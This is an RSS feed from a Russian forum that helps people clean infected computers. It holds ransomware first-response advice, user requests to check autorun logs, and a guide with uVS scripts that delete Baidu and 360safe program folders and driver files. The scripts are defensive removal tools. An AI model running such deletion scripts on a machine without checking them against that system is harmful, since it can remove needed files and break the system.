Естественная реакция большинства пользователей заключается в том, чтобы сначала удалить инфекцию как можно быстрее. Этот инстинкт, к сожалению, неверен. В большинстве случаев нам потребуется исполняемый файл шифратора, чтобы выяснить, что именно шифратор сделал с вашими файлами. Поиск правильного образца вымогателей становится бесконечно более сложным, когда вы удалили инфекцию и не можете предоставить нам вымогателей. Можно отключить заражение, отключив все записи автозапуска, указывающие на него, или поместив заражение в карантин. Однако важно не удалять его из карантина или удалять вредоносные файлы сразу без резервного копирования.<br /><br /><b>Отключите любое программное обеспечение для оптимизации и очистки системы<br /></b>Многие вымогатели будут хранить либо сами, либо необходимые файлы в папке временных файлов. Если вы используете инструменты очистки или оптимизации системы, такие как CCleaner, BleachBit, Glary Utilities, Clean Master, Advanced SystemCare, Wise Disk / Registry Cleaner, Wise Care, Auslogics BoostSpeed, System Mechanic или что-либо подобное, немедленно отключите эти инструменты и убедитесь, что автоматические запуски не запланированы. В противном случае эти приложения могут удалить зараженные или необходимые файлы-вымогатели из вашей системы, которые могут потребоваться для восстановления ваших данных.<br /><br /><b>Создайте резервную копию ваших зашифрованных файлов</b><br />
Некоторые вымогатели имеют скрытые полезные нагрузки, которые будут удалять и перезаписывать зашифрованные файлы через определенное время. Расшифровщики также могут быть не на сто процентов точными, поскольку вымогатель часто обновляется или просто глючит и может повредить файлы в процессе восстановления. В этих случаях лучше использовать зашифрованную резервную копию, чем не иметь ее вообще. Поэтому мы настоятельно рекомендуем вам сначала создать резервную копию ваших зашифрованных файлов, прежде чем делать что-либо еще.<br /><br /><b>Если пострадал сервер: выясните точку входа и закройте ее</b><br />
Особенно в последнее время мы видели много заражений серверов. Обычный способ - это перебор паролей пользователей через RDP / Remote Desktop. Мы настоятельно рекомендуем вам проверить журналы событий на наличие большого количества попыток входа в систему. Если вы обнаружите такие записи или если ваш журнал событий будет пустым, ваш сервер был взломан через RDP. Крайне важно немедленно изменить все пароли учетных записей пользователей. Мы также предлагаем отключить RDP, если это возможно, или хотя бы изменить порт.
<blockquote>

<div>Кроме того, важно проверить все учетные записи пользователей на сервере, чтобы убедиться, что злоумышленники не создали собственных учетных записей, которые позволили бы им позднее получить доступ к системе.</div>
</blockquote>
<br /><b>Выясните, какой из вымогателей заразил вас</b><br />
И последнее, но не менее важное: важно определить, какой вымогатель заразил вас. Такие сервисы, как <a href="http://virustotal.com" rel="nofollow"><b>VirusTotal</b></a>, который позволяет вам сканировать вредоносные файлы, и <b><a href="https://id-ransomware.malwarehunterteam.com/index.php" rel="nofollow">ID Ransomware</a></b>, который позволяет загружать записку с выкупом и зашифрованные файлы для идентификации семейства вымогателей, невероятно полезны, и мы, вероятно, в конечном итоге попросим вас предоставить результаты любого из этих Сервисов. Таким образом, предоставляя их сразу, вы можете ускорить процесс возврата ваших файлов.<br /><br /><a href="https://support.emsisoft.com/topic/29386-first-steps-when-dealing-with-ransomware/" rel="nofollow">https://support.emsisoft.com/topic/29386-first-steps-when-dealing-with-ransomware/</a>]]>
        </description>
    </item>
    <item>
        <title>Страничку в контакте взламывают по 2 раза за вечер. Может вирусная активность?</title>
        <link>https://chklst.ru/discussion/1625/stranichku-v-kontakte-vzlamyvayut-po-2-raza-za-vecher-mozhet-virusnaya-aktivnost</link>
        <pubDate>Thu, 20 Sep 2018 20:18:17 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1625@/discussions</guid>
        <description><![CDATA[Дорогие хелперы! Мою страничку подозрительно часто стали взламывать злоумышленники и рассылать от моего имени просьбы материального характера. Может вирус какой сидит?<br />
Образ автозапуска  <a href="http://rgho.st/65wQ7RNYc" rel="nofollow">http://rgho.st/65wQ7RNYc</a><br />
Посмотрите, пожалуйста:)]]>
        </description>
    </item>
    <item>
        <title>SpyHunter что за зверь? используете ли?</title>
        <link>https://chklst.ru/discussion/1623/spyhunter-chto-za-zver-ispolzuete-li</link>
        <pubDate>Tue, 05 Jun 2018 08:58:24 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>hrol</dc:creator>
        <guid isPermaLink="false">1623@/discussions</guid>
        <description><![CDATA[вот посоветовали утилиту. во-первых что это такое? есть ли опыт использования?<br />
во-вторых откудас качать, чтоб ещё больше в компьютер не внести заразы, если уже есть что-то?<br />
прим.: собссно хочу найти гадость которая иногда открывает "левые" сайты вместо нужных ссылок.]]>
        </description>
    </item>
    <item>
        <title>Медленно загружается браузер, пишет ошибка в профиле</title>
        <link>https://chklst.ru/discussion/1620/medlenno-zagruzhaetsya-brauzer-pishet-oshibka-v-profile</link>
        <pubDate>Fri, 04 May 2018 11:37:51 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1620@/discussions</guid>
        <description><![CDATA[Добрый день, хэлперы. Что-то стал медленно  загружаться браузер, пишет - ошибка в профиле, ошибка синхронизации.. Может какую гадость "подцепила"..<br />
Образ автозапуска <a href="http://rgho.st/6Lw5FlJWS" rel="nofollow">http://rgho.st/6Lw5FlJWS</a>]]>
        </description>
    </item>
    <item>
        <title>Случайно установился аваст, помогите убрать, пожалуйста.</title>
        <link>https://chklst.ru/discussion/1616/sluchayno-ustanovilsya-avast-pomogite-ubrat-pozhaluysta</link>
        <pubDate>Tue, 16 Jan 2018 14:21:30 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1616@/discussions</guid>
        <description><![CDATA[Добрый вечер,господа хелперы! Во время скачивания актуальной версии <b>ссleaner</b>, не убрала галочку - скачать аваст. Теперь в системе ужас что творится. Я скачала утилиту для удаления аваста,но  в хр в безопасный режим не войти, а в обычном она не удаляет его..Помогите, пожалуйста. Если возможно,то побыстрее..]]>
        </description>
    </item>
    <item>
        <title>Подцепила троян, после лечения активного заражения, хотела проверить - все в порядке?</title>
        <link>https://chklst.ru/discussion/1618/podcepila-troyan-posle-lecheniya-aktivnogo-zarazheniya-hotela-proverit-vse-v-poryadke</link>
        <pubDate>Mon, 05 Feb 2018 08:58:40 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1618@/discussions</guid>
        <description><![CDATA[Здравствуйте! Зашла в систему, касперский красный, как рак..Даже слетели ключи. Хорошо,что они в личном кабинете хранятся..Все восстановила,но нужно посмотреть образ,если можно..<br /><br /><a href="http://rgho.st/7lQSP7PZB" rel="nofollow">http://rgho.st/7lQSP7PZB</a>]]>
        </description>
    </item>
    <item>
        <title>Проверить на вирусы</title>
        <link>https://chklst.ru/discussion/1609/proverit-na-virusy</link>
        <pubDate>Thu, 23 Nov 2017 18:50:41 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1609@/discussions</guid>
        <description><![CDATA[Уважаемые хэлперы. Уже в который раз взламывают мою страничку в контакте, рассылают от моего имени всякую ерунду. Пароли достаточно надежные ( придумывают айтишники на работе). С использованием чисел, регистра, никаких имен..Возможно вирус-кейлоггер сидит, ворует пароли? хотела бы убедиться, что это не так..Посмотрите,пожалуйста образ автозапуска.<br /><br /><a href="http://rgho.st/6BR9ZMCm2" rel="nofollow">http://rgho.st/6BR9ZMCm2</a>]]>
        </description>
    </item>
    <item>
        <title>Не могу полностью удалить avg</title>
        <link>https://chklst.ru/discussion/1605/ne-mogu-polnostyu-udalit-avg</link>
        <pubDate>Thu, 12 Oct 2017 20:05:59 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Люся</dc:creator>
        <guid isPermaLink="false">1605@/discussions</guid>
        <description><![CDATA[Добрый вечер, господа хелперы! Скачала утилиту для удаления avg, сильно стал нагружать систему (последние версии ресурсозависимые, а у меня система слабая).. Из разных режимов пробовала удалить ( и из безопасного тоже),но вижу,что не удалилась..Помогите, пожалуйста. Напишите волшебный скрипт для удаления <b>avg</b>/<br />
Уже поставила бесплатный от Майкрософт,но вижу еще avg присутствует.<br />
Образ автозапуска <a href="http://rgho.st/6BgfJ9Y2K" rel="nofollow">http://rgho.st/6BgfJ9Y2K</a>]]>
        </description>
    </item>
    <item>
        <title>не включается сетевой адаптер</title>
        <link>https://chklst.ru/discussion/1604/ne-vklyuchaetsya-setevoy-adapter</link>
        <pubDate>Thu, 31 Aug 2017 15:39:00 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>hrol</dc:creator>
        <guid isPermaLink="false">1604@/discussions</guid>
        <description><![CDATA[адаптер Marvell встроенный в мать gygabyte<br />
драйвер не обновляется<br /><br />
хотел установить модем 3G , тоже не дает<br />
подозреваю вирусяку.<br />
Малварей прогнал, но не обновленной, 50 подозрительных файлов удалил.<br />
/вообще машина очень как бы помягче сказать ЗАМУСОРЕННАЯ/<br />
адаптер не заработал<br /><br />
образ системы прилагаю.<br /><a href="http://rgho.st/7p94StfZX" rel="nofollow">http://rgho.st/7p94StfZX</a><br /><br />
помогите друзья на пиво заработать <img src="https://chklst.ru/resources/emoji/smile.png" title=":)" alt=":)" height="20" />]]>
        </description>
    </item>
    <item>
        <title>не было доступа к free.drweb.ru/cureit</title>
        <link>https://chklst.ru/discussion/1603/ne-bylo-dostupa-k-free-drweb-ru-cureit</link>
        <pubDate>Thu, 31 Aug 2017 15:30:40 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>hrol</dc:creator>
        <guid isPermaLink="false">1603@/discussions</guid>
        <description><![CDATA[приветсвую! давно не был, надеюсь, у всех всё более менее в порядке<br />
/сразу два компа потому две темы создам /<br /><br />
личный комп, хочу планово проверить.<br />
че было:<br />
1. браузер Maxthon не все сайты открывал, ну и какие-то тормоза (мне казалось) по скорости инета<br />
/инет правда на 4g (LTE) модеме в лесу/<br />
2. сегодня сделал клон HDD. запустил систему.<br />
3. и тут меня осенило, что рядом стоящий комп не работает/не выходит в сеть из-за вирусов, а я флешкой туда-сюда логи таскаю...<br />
4. решил провериться скачав DrCure it ну и паралельно запустил Malwarebytes<br />
5. пока малварь обновляла сигнатуры, я пошел на <a href="https://free.drweb.ru/cureit" rel="nofollow">https://free.drweb.ru/cureit</a> а меня не пускают! "невозможно отобразить... че-то там"<br />
6. 6. ну всё думаю, приплыли... начал пароль от форума вспоминать, логины там всякие...пока малварь чекала систему<br />
7. нашла она один Adware.FileTour по адресу: C:\Users\*name*\Appdata\Local\setap.exe<br />
8. удалила, перезагрузка...<br />
9. и вот я перед созданием темы опять на сайт ДРВЕБ попробовал зайти и всё прекрасно открылось...<br /><br />
но я всё-таки же уже сделал ОБРАЗ, не пропадать ведь добру <img src="https://chklst.ru/resources/emoji/wink.png" title=";)" alt=";)" height="20" /><br />
прошу помогите проверить<br />
в общем выкладываю образ и заодно хочу спросить<br /><a href="http://rgho.st/8p65VpFg8" rel="nofollow">http://rgho.st/8p65VpFg8</a><br />
dropmefile.com не пробовали пользоваться? удобная штука. <a href="http://dropmefiles.com/C9nXs" rel="nofollow">http://dropmefiles.com/C9nXs</a>]]>
        </description>
    </item>
    <item>
        <title>Проблема с загрузкой видео  из youtube</title>
        <link>https://chklst.ru/discussion/1595/problema-s-zagruzkoy-video-iz-youtube</link>
        <pubDate>Mon, 05 Jun 2017 10:41:20 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>пельмешка</dc:creator>
        <guid isPermaLink="false">1595@/discussions</guid>
        <description><![CDATA[<a href="https://www.sendspace.com/file/arc7d1" rel="nofollow">https://sendspace.com/file/arc7d1</a>]]>
        </description>
    </item>
    <item>
        <title>Baidu и прочее</title>
        <link>https://chklst.ru/discussion/1588/baidu-i-prochee</link>
        <pubDate>Thu, 23 Mar 2017 17:25:48 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Bumblebee</dc:creator>
        <guid isPermaLink="false">1588@/discussions</guid>
        <description><![CDATA[Приветствую от погибшего писихелпа) Ноут подростка, зараза завелась, посмотрите логи )<br /><a href="http://rgho.st/7lSZyS6zt" rel="nofollow">uVS</a>]]>
        </description>
    </item>
    <item>
        <title>помогите решить проблему</title>
        <link>https://chklst.ru/discussion/1587/pomogite-reshit-problemu</link>
        <pubDate>Tue, 21 Mar 2017 20:43:09 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Толеби</dc:creator>
        <guid isPermaLink="false">1587@/discussions</guid>
        <description><![CDATA[Virus решение...]]>
        </description>
    </item>
    <item>
        <title>Подозрение на заражение</title>
        <link>https://chklst.ru/discussion/1581/podozrenie-na-zarazhenie</link>
        <pubDate>Tue, 03 Jan 2017 10:15:41 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>Serega_490101</dc:creator>
        <guid isPermaLink="false">1581@/discussions</guid>
        <description><![CDATA[С наступившим Новым Годом!<br /><br />
Создаю новый почтовый ящик на яндексе. Через некоторое время (обычно несколько дней) после этого при входе в него появляется сообщение о том, что почтовый ящик заблокирован из-за подозрения на взлом. При этом со старым ящиком такого не происходит.<br />
Прикладываю лог uVS]]>
        </description>
    </item>
    <item>
        <title>piton331: Заражен браузер</title>
        <link>https://chklst.ru/discussion/1564/piton331-zarazhen-brauzer</link>
        <pubDate>Sat, 30 Jul 2016 16:58:20 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>piton331</dc:creator>
        <guid isPermaLink="false">1564@/discussions</guid>
        <description><![CDATA[Доброго времени суток уважаемые хелперы. Случилась такая беда: в браузере непонятные редиректы, открываются левые ссылки. Антивирус комодо ничего не нашел. Выручайте. Спасибо.]]>
        </description>
    </item>
    <item>
        <title>ivanovpro777: Плановая проверка</title>
        <link>https://chklst.ru/discussion/1536/ivanovpro777-planovaya-proverka</link>
        <pubDate>Fri, 02 Oct 2015 15:50:17 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>ivanovpro777</dc:creator>
        <guid isPermaLink="false">1536@/discussions</guid>
        <description><![CDATA[Компьютер поступил в ремонт с проблемой
NTLDR is missing
Что было мною проделано:
1) проверка через Victoria - диск здоров
2) применение команд Fixboot и Fixmbr через консоль восстановление установочного диска Windows XP
3) заменил sata шлейф и менял порты подключения
4) Загрузился с LiveCD проверил, раздел С читается (он один на диске), свободного места почти 250 Гб
Что дальше делать я не знаю...
]]>
        </description>
    </item>
    <item>
        <title>Удаляем Baidu, BaiduAn, BaiduSD, 360safe и прочее</title>
        <link>https://chklst.ru/discussion/1473/udalyaem-baidu-baiduan-baidusd-360safe-i-prochee</link>
        <pubDate>Wed, 19 Nov 2014 22:13:53 +0000</pubDate>
        <category>Форум лечения заражений</category>
        <dc:creator>safety</dc:creator>
        <guid isPermaLink="false">1473@/discussions</guid>
        <description><![CDATA[<img border="50" src="http://chklst.ru/docs/baidu/foto.jpg" alt="image" style="float: left; margin-left: 15px; margin-right: 15px;" />Одна из проблем на форумах безопасности - нашествие полчищ китайских антивирусов: <b>baidu, baiduAn, BaiduSD, 360safe</b> с цифровыми подписями от Qihoo 360 Software (Beijing) Company Limited, Beijing baidu Netcom science and technology co.ltd,  и др. Избавиться от нежелательных защитников системы в отличие от их установки бывает не так просто. Через "установку_удаление программ", как правило проблема не решается. В итоге пользователь пускает в ход самые разные способы удалений с использованием различного набора программ (Combofix, malwarebytes, hj, AdwCleaner, AVZ, OTL, cureit и другие) пытаясь избавиться от густо населенной популяции модулей этого антивируса из безопасного или нормального режима работы системы. Казалось бы наступило долгожданное избавление, ан, нет, baidu жив, baidu воскрес, baidu продолжает нагружать систему под самый потолок.
Прежде всего один из выводов, полученных в ходе очистки системы:
<b>- не надо пытаться удалить все и вся одним скриптом, одной чисткой. </b>
1. Необходимо исключить модули, сервисы, драйвера этого антивируса из автозапуска.
Для этого используем Universal Virus Sniffer. <a rel="nofollow" href="http://chklst.ru/forum/discussion/4/kak-sozdat-obraz-avtozapuska-v-uvs-kratkaya-instrukciya#Item_1">И создаем полный образ автозапуска</a>. 
<b><a rel="nofollow" href="http://chklst.ru/docs/baidu/DENIS-PC_2014-11-11_16-47-27.7z">(Пример такого файла во вложении)</a></b>
Используем в uVS для исключения защищенных ссылок реестра метод безопасной виртуализации.

<img src="http://chklst.ru/docs/baidu/baidu1.jpg" alt="image" />
<img src="http://chklst.ru/docs/baidu/baidu2.jpg" alt="image" />
<img src="http://chklst.ru/docs/baidu/baidu3.jpg" alt="image" />
итак, исключаем скриптом указанные сервисы, драйвера и модули из автозапуска.

<pre xml:lang="txt">;uVS v3.85 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE

sreg

delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\3.0.0.3971\BAIDUANSVC.EXE
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\BAIDU\BAIDUHIPS\1.1.0.733\BAIDUHIPS.EXE
delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086\BAIDUSDSVC.EXE
delref %Sys32%\DRIVERS\BD0001.SYS
delref %Sys32%\DRIVERS\BD0002.SYS
delref %Sys32%\DRIVERS\BD0003.SYS
delref %Sys32%\DRIVERS\BDARKIT.SYS
delref %Sys32%\DRIVERS\BDDEFENSE.SYS
delref %Sys32%\DRIVERS\BDENHANCEBOOST.SYS
delref %Sys32%\DRIVERS\BDMNETMON.SYS
delref %Sys32%\DRIVERS\BDMWRENCH.SYS
delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\3.0.0.3971\BAIDUANTRAY.EXE
delref %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086\BAIDUSDTRAY.EXE
areg</pre>
после перезагрузки системы, активность данного продукта должна быть исключена.

2. удаляем все (многочисленные) файлы данного антивируса вторым скриптом уже без виртуализации.
<img src="http://chklst.ru/docs/baidu/baidu4.jpg" alt="image" />

<pre xml:lang="txt">;uVS v3.85 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v385c
OFFSGNSAVE

deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\2.3.0.2225
deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUAN\3.0.0.3971
deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086
deldirex %SystemDrive%\PROGRAM FILES\COMMON FILES\BAIDU\BAIDUHIPS\1.1.0.733
deldirex %SystemDrive%\PROGRAM FILES\COMMON FILES\BAIDU\BDDOWNLOAD\108
deldirex %SystemDrive%\PROGRAM FILES\BAIDU\BAIDUSD\2.1.0.3086\EXPLUGIN
del %Sys32%\DRIVERS\BD0001.SYS
del %Sys32%\DRIVERS\BD0002.SYS
del %Sys32%\DRIVERS\BD0003.SYS
del %Sys32%\DRIVERS\BDARKIT.SYS
del %Sys32%\DRIVERS\BDDEFENSE.SYS
del %Sys32%\DRIVERS\BDENHANCEBOOST.SYS
del %Sys32%\DRIVERS\BDMNETMON.SYS
del %Sys32%\DRIVERS\BDMWRENCH.SYS
deltmp
delnfr
restart
</pre>

<b><a rel="nofollow" href="http://chklst.ru/docs/baidu/DENIS-PC_2014-11-11_16-47-27.7z">файл образа автозапуска.</a></b>

<b>(с), chklst.ru</b>]]>
        </description>
    </item>
   </channel>
</rss>
